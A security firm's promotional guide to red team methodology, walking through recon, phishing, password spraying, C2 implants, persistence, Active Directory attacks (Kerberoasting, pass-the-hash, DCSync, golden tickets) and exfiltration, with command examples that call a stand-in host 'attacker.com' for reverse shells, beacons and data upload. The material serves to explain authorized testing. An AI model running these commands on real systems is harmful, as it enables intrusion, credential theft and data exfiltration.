Modern attackers do not knock on the front door. They slip in through forgotten subdomains, misconfigured cloud storage buckets, phishing links disguised as routine emails, and service accounts nobody has reviewed in three years. Defending against this kind of patient, methodical adversary requires something more than a vulnerability scanner and a quarterly audit. It requires a red team.
Red teaming is the practice of simulating real-world threat actors against your organization's people, processes, and technology to uncover security gaps before criminal groups do. Unlike standard penetration testing, which is typically scoped and time-boxed, a red team engagement follows full attack chains, from initial access all the way through lateral movement, privilege escalation, and simulated data exfiltration.
This guide breaks down the core phases of red team attack methodology with the technical depth security professionals need, and illustrates why engaging a professional team matters at every stage.
Red team attack methodology is a structured approach to offensive security that mirrors the tactics, techniques, and procedures (TTPs) documented in frameworks like MITRE ATT&CK. Rather than checking boxes for compliance, a red team simulates a credible threat actor targeting your specific organization, your crown jewels, your technology stack, and your people.
The goal is not to find every vulnerability. The goal is to answer a harder question: if a determined attacker targeted us today, how far would they get?
Redfox Cybersecurity's red team services are built around exactly this question, delivering intelligence-driven engagements that give security leaders clear answers and a roadmap to remediation.
Every red team engagement begins long before a single packet is sent. Reconnaissance is the intelligence-gathering phase where operators build a detailed picture of the target without triggering any internal alerts.
Passive recon involves gathering publicly available data about your organization's digital footprint. Operators look at domain registration records, certificate transparency logs, LinkedIn profiles, job postings, GitHub repositories, and public cloud assets.
Tools and commands used during this phase include:
# Enumerate subdomains using passive sources
subfinder -d targetcorp.com -silent -o subdomains.txt
# Pull certificate transparency logs
curl -s "https://crt.sh/?q=%25.targetcorp.com&output=json" | jq '.[].name_value' | sort -u
# Harvest employee names and emails
theHarvester -d targetcorp.com -b google,linkedin,bing -l 500
# Identify exposed S3 buckets
aws s3 ls s3://targetcorp-backup --no-sign-request
[cta]
Job postings are particularly valuable. A posting for a "Palo Alto Networks Engineer" tells an attacker exactly which firewall vendor to research. A posting for a "Snowflake Data Engineer" signals cloud data warehouse infrastructure.
Once passive data is compiled, operators move to light active recon, which involves interacting with systems in ways that may generate logs but are unlikely to trigger alerts.
# Port scan with OS fingerprinting
nmap -sS -sV -O -p- --min-rate 5000 -oA full_scan 203.0.113.0/24
# Identify web technologies and frameworks
whatweb -a 3 https://targetcorp.com
# Directory and endpoint enumeration
ffuf -w /usr/share/wordlists/dirb/big.txt -u https://targetcorp.com/FUZZ -mc 200,301,302,403
# Check for exposed Git repositories
git-dumper https://targetcorp.com/.git ./dumped_repo
[cta]
This phase often reveals forgotten development environments, staging servers exposed to the internet, administrative panels, and API endpoints with no authentication.
Initial access is the phase most organizations imagine when they think about cyberattacks. In reality, it is rarely a sophisticated zero-day exploit. It is almost always something far more mundane: a phishing email, a password spray, a misconfigured internet-facing service, or a vulnerable VPN appliance.
Red teams craft targeted phishing campaigns based on OSINT gathered in the previous phase. A phishing email referencing the target's actual IT helpdesk portal, their VPN solution, or their Microsoft 365 tenant is substantially more convincing than a generic lure.
# Stand up a credential harvesting infrastructure using GoPhish
gophish &
# Generate a convincing Microsoft 365 login clone
evilginx2 -p /opt/evilginx2/phishlets/ -developer
# Create a malicious Office macro payload
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=attacker.com LPORT=443 -f vba -o payload.vba
[cta]
Password spraying against VPN portals, Microsoft 365, and OWA remains one of the highest-yield initial access techniques in modern red team engagements.
# Password spray against Microsoft 365 with lockout-safe timing
sprayhound -U users.txt -p 'Winter2024!' --tenant targetcorp.com --delay 30
# Exploit a known CVE in an unpatched VPN appliance
searchsploit -t "Pulse Secure" | grep -i "RCE"
python3 exploit_pulse.py --target vpn.targetcorp.com --lhost attacker.com --lport 443
# Check for default credentials on exposed admin panels
hydra -L admin_users.txt -P common_passwords.txt targetcorp.com https-post-form "/admin/login:username=^USER^&password=^PASS^:Invalid"
[cta]
If your organization has not had its external attack surface assessed recently, now is the time. Redfox Cybersecurity's penetration testing services include full external network assessments designed to identify and exploit exactly these entry points before real attackers do.
After initial access, a red team operator's priority is to establish a reliable, covert foothold. This means deploying a command-and-control (C2) framework, establishing persistence mechanisms, and blending into normal network traffic.
Modern red teams use frameworks like Cobalt Strike, Havoc, or Sliver with carefully crafted communication profiles that mimic legitimate traffic patterns, such as Microsoft Teams telemetry or Cloudflare API calls.
# Deploy Sliver C2 server
sliver-server
# Generate an implant that beacons over HTTPS every 60 seconds with 15% jitter
generate --mtls attacker.com --os windows --arch amd64 --format exe --jitter 15 --reconnect 60 --save /tmp/beacon.exe
# Use DNS-over-HTTPS as a fallback C2 channel
generate --dns attacker.com --canary attacker.com
[cta]
# Scheduled task persistence (runs at user logon)
schtasks /create /tn "WindowsUpdateHelper" /tr "C:\Users\Public\svchost.exe" /sc onlogon /ru SYSTEM /f
# WMI event subscription for fileless persistence
$filter = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments @{Name="UpdateFilter";EventNameSpace="root\cimv2";QueryLanguage="WQL";Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"}
# Registry run key
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsUpdate" /t REG_SZ /d "C:\Users\Public\beacon.exe" /f
[cta]
With a foothold established, red team operators pivot to understanding the internal environment. This phase is where engagements get interesting and where defenders most commonly fail.
Active Directory is almost always the backbone of enterprise environments, and it is almost always misconfigured in ways that allow privilege escalation.
# BloodHound data collection for AD attack path analysis
SharpHound.exe --CollectionMethods All --ZipFileName ad_data.zip
# Enumerate Kerberoastable accounts
GetUserSPNs.py targetcorp.local/jsmith:Password1 -dc-ip 10.10.10.1 -request -outputfile kerberoast.txt
# Crack captured hashes
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt --force
# Check for unconstrained delegation
Get-ADComputer -Filter {TrustedForDelegation -eq $true} -Properties TrustedForDelegation,ServicePrincipalName
[cta]
# Pass-the-Hash using CrackMapExec
crackmapexec smb 10.10.10.0/24 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c --exec-method wmiexec
# Remote service creation for lateral movement
sc \\\\10.10.10.50 create "UpdateService" binpath= "C:\\Windows\\Temp\\beacon.exe" start= auto
# DCOM lateral movement (stealthier than PSExec)
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","10.10.10.50"))
$com.Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c beacon.exe","7")
[cta]
# DCSync attack to dump all domain credentials
secretsdump.py targetcorp.local/domainadmin:'Password1'@10.10.10.1 -just-dc
# Golden Ticket creation after obtaining krbtgt hash
ticketer.py -nthash <krbtgt_hash> -domain-sid S-1-5-21-... -domain targetcorp.local Administrator
# ACL abuse: WriteDACL on a privileged group
Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity jsmith -Rights All -Verbose
[cta]
This is precisely where red team engagements provide irreplaceable value. Automated scanners cannot walk an Active Directory attack path from a compromised workstation to Domain Admin. A skilled red team operator can, and often does, in under four hours.
Engage Redfox Cybersecurity's red team specialists to find out how far an attacker could get inside your environment before your detection controls respond.
Once the red team has achieved the agreed-upon objectives, whether that is reaching a specific server, obtaining domain administrator credentials, or accessing sensitive data stores, they simulate the attacker's end goal: exfiltration or impact.
# Identify sensitive data locations
findstr /si "password" *.txt *.xml *.config C:\Users\
# Stage and compress data for exfiltration
7z a -p"RedTeamTest" -mhe=on staged_data.7z C:\Shares\Finance\
# Exfiltrate over DNS (bypasses many DLP controls)
cat sensitive_file.txt | xxd -p | while read line; do dig $line.attacker.com; done
# HTTPS exfiltration blending with normal traffic
curl -X POST https://attacker.com/upload -H "Content-Type: application/octet-stream" --data-binary @staged_data.7z
[cta]
Some engagements include a ransomware simulation to test detection and backup recovery capabilities.
# Simulate file encryption across a network share (test only, no real encryption)
# Use a benign marker file to validate detection
echo "REDTEAM_SIMULATION" > \\\\fileserver\\shares\\RANSOM_MARKER.txt
# Check if endpoint detection fires on mass file rename (common ransomware indicator)
for f in *.docx; do mv "$f" "${f%.docx}.encrypted"; done
[cta]
A red team engagement is only as valuable as the intelligence it produces. The final deliverable must translate raw technical findings into executive risk context and actionable remediation guidance.
A mature red team report covers the complete attack narrative from initial access to objectives achieved, a risk-ranked list of findings mapped to MITRE ATT&CK techniques, detection gap analysis showing which attacker actions went undetected, and specific, prioritized remediation recommendations with validation criteria.
The debrief phase, often called a purple team session, involves walking the defensive team through every attacker action so they can tune detection rules, improve response playbooks, and validate that remediations are effective.
This is one of the most common points of confusion for security buyers. Penetration testing and red teaming are related but distinct services.
Penetration testing is scoped, typically to a specific application, network segment, or system. It finds and validates vulnerabilities within that scope. It is excellent for compliance requirements and targeted risk assessment.
Red teaming is goal-oriented and unconstrained by scope. The objective is a defined business impact, not a list of CVEs. Red teams use stealth, social engineering, physical intrusion if in scope, and multi-stage attack chains that cross multiple technology domains. Blue teams typically do not know an engagement is active, making it a genuine test of detection and response capabilities.
Both services are necessary, and neither replaces the other. If you are unsure where to start, Redfox Cybersecurity's services team can advise on the right engagement type based on your maturity level, compliance requirements, and threat model.
Getting maximum value from a red team engagement requires preparation on the defensive side as well.
Before the engagement, define your crown jewels clearly. Know which systems, data, or capabilities represent your highest business risk. Establish clear rules of engagement, including what is out of scope, what notification procedures exist, and how the red team should handle discovered critical vulnerabilities that require immediate remediation.
Ensure your security operations center is staffed and monitoring. A red team engagement is wasted if the blue team is overwhelmed with other incidents and cannot investigate attacker activity. The real value comes from testing whether your people, process, and technology detect and respond to realistic attack behaviors.
After the engagement, invest in a structured purple team process. Go through every attacker action, every tool executed, every lateral movement hop, and verify that your SIEM, EDR, and network monitoring tools have visibility. Where gaps exist, build detection content and validate it before the next assessment.
Security leaders increasingly face pressure to demonstrate that their security investments translate to actual risk reduction. Compliance certifications tell auditors that controls exist. Red team results tell the board whether those controls work against a real adversary.
Organizations that conduct regular red team exercises consistently identify gaps that neither their internal teams nor their technology vendors discovered. They find that their incident response playbooks have never been exercised against realistic attack scenarios. They find that their network segmentation has drift. They find that their detection rules fire on test cases but miss real attack patterns.
The cost of discovering these gaps through a red team engagement is a fraction of the cost of discovering them after a breach.
Partner with Redfox Cybersecurity to build a red team program that scales with your organization's growth and evolving threat landscape.
Red team attack methodology is not a product. It is a disciplined, intelligence-driven process that requires skilled operators, realistic objectives, and a commitment to translating findings into measurable security improvements.
The phases covered here, from OSINT and initial access through lateral movement, privilege escalation, and simulated exfiltration, represent the same kill chain that sophisticated threat actors execute against organizations every day. Understanding how that chain works is the first step toward breaking it.
The second step is testing whether your defenses can actually stop it.
Redfox Cybersecurity delivers red team, penetration testing, and adversary simulation services built around real-world threat actor behavior. Whether you need a focused external network assessment, a full-scope red team engagement, or a purple team workshop to close detection gaps, the team is equipped to deliver results that matter.
Explore Redfox Cybersecurity's penetration testing and red team services and take the next step toward understanding your true security posture.
Redfox Cyber Security Inc.
8 The Green, Ste. A, Dover,
Delaware 19901,
United States.
.avif)
